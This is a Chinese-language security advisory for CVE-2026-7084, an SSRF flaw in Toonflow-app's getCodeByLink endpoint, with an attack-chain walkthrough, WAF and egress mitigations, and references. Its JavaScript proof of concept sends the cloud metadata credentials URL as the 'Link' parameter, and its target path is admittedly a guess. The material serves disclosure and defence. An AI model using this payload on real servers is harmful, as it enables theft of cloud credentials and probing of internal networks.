CVE-2026-7084 HBAI Toonflow-app SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-7084

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

HBAI-Ltd Toonflow-app

漏洞概述

HBAI-Ltd Toonflow-app 在版本 1.1.1 及之前存在服务端请求伪造（SSRF）漏洞。该漏洞源于组件 `getCodeByLink` 端点中 `fetch` 函数对参数 `Link` 的验证不足。攻击者可通过操纵该参数诱导服务器向任意地址发起请求。尽管厂商声称该接口设计用于获取并运行 TS 代码，属于高风险功能，但未实施有效防护仍可被利用。目前利用代码已公开，需警惕内网探测风险。

技术细节

漏洞的具体位置在于 `src/routes/setting/vendorConfig/getCodeByLink.ts` 文件中的 `fetch` 函数。该函数接收用户提供的 `Link` 参数，并直接使用该参数发起服务端 HTTP 请求，而未对目标 URL 的格式、协议或目标 IP 地址段进行严格的校验和限制。这种缺陷允许攻击者通过构造恶意链接，诱导服务器向内网敏感资源（如 127.0.0.1, 192.168.x.x, 云元数据服务 169.254.169.254）发起请求。虽然厂商回应称该接口设计初衷即为高风险操作，要求用户在使用前明确知晓风险，但在缺乏网络隔离和输入过滤的情况下，该功能极易被利用作为跳板进行内网渗透或敏感数据窃取。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标正在使用 HBAI-Ltd Toonflow-app 且版本低于或等于 1.1.1。

STEP 2

2. 构造载荷

攻击者构造包含内网 IP 地址（如 127.0.0.1）或云元数据地址的恶意 URL，并将其赋值给 `Link` 参数。

STEP 3

3. 发起请求

攻击者向受影响的 `getCodeByLink` 端点发送 HTTP GET/POST 请求，携带恶意的 `Link` 参数。

STEP 4

4. 服务端请求

服务器端解析请求，使用 `fetch` 函数向攻击者指定的内网地址发起连接。

STEP 5

5. 信息泄露

服务器将内网资源的响应返回给攻击者，导致敏感信息泄露或为进一步攻击提供依据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// POC for CVE-2026-7084
// Target: HBAI-Ltd Toonflow-app <= 1.1.1
// Endpoint: /getCodeByLink (or specific route based on implementation)
// Description: Sending a request with a malicious 'Link' parameter to trigger SSRF.

const axios = require('axios');
const targetUrl = 'http://victim-site.com/src/routes/setting/vendorConfig/getCodeByLink'; // Replace with actual target

// Example payload to access AWS Metadata or internal local service
const maliciousLink = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'; 

async function checkSSRF() {
    try {
        const response = await axios.get(targetUrl, {
            params: {
                Link: maliciousLink
            },
            timeout: 5000
        });
        console.log('Status:', response.status);
        console.log('Response Data:', response.data);
    } catch (error) {
        console.error('Request failed or timed out (might indicate interaction):', error.message);
    }
}

checkSSRF();

影响范围

HBAI-Ltd Toonflow-app <= 1.1.1

防御指南

临时缓解措施

若无法立即升级或修复，建议在应用防火墙（WAF）或反向代理层面对 `Link` 参数进行深度过滤，拦截包含内网 IP 地址（如 127.0.0.1, 192.168.x.x, 10.x.x.x, 172.16-31.x.x, 169.254.169.254）的请求。同时，应严格限制应用服务器的出站网络访问权限，仅允许访问必要的白名单域名，阻断对内网敏感资源的扫描路径。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7084
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7084
3 Details https://www.cvedetails.com/cve/CVE-2026-7084/
4 VulDB https://vuldb.com/cve/CVE-2026-7084
5 Link https://github.com/HBAI-Ltd/Toonflow-app/
6 Link https://github.com/HBAI-Ltd/Toonflow-app/issues/95
7 Link https://github.com/HBAI-Ltd/Toonflow-app/issues/95#issuecomment-4208181221
8 Link https://vuldb.com/submit/799582
9 Link https://vuldb.com/vuln/359659
10 Link https://vuldb.com/vuln/359659/cti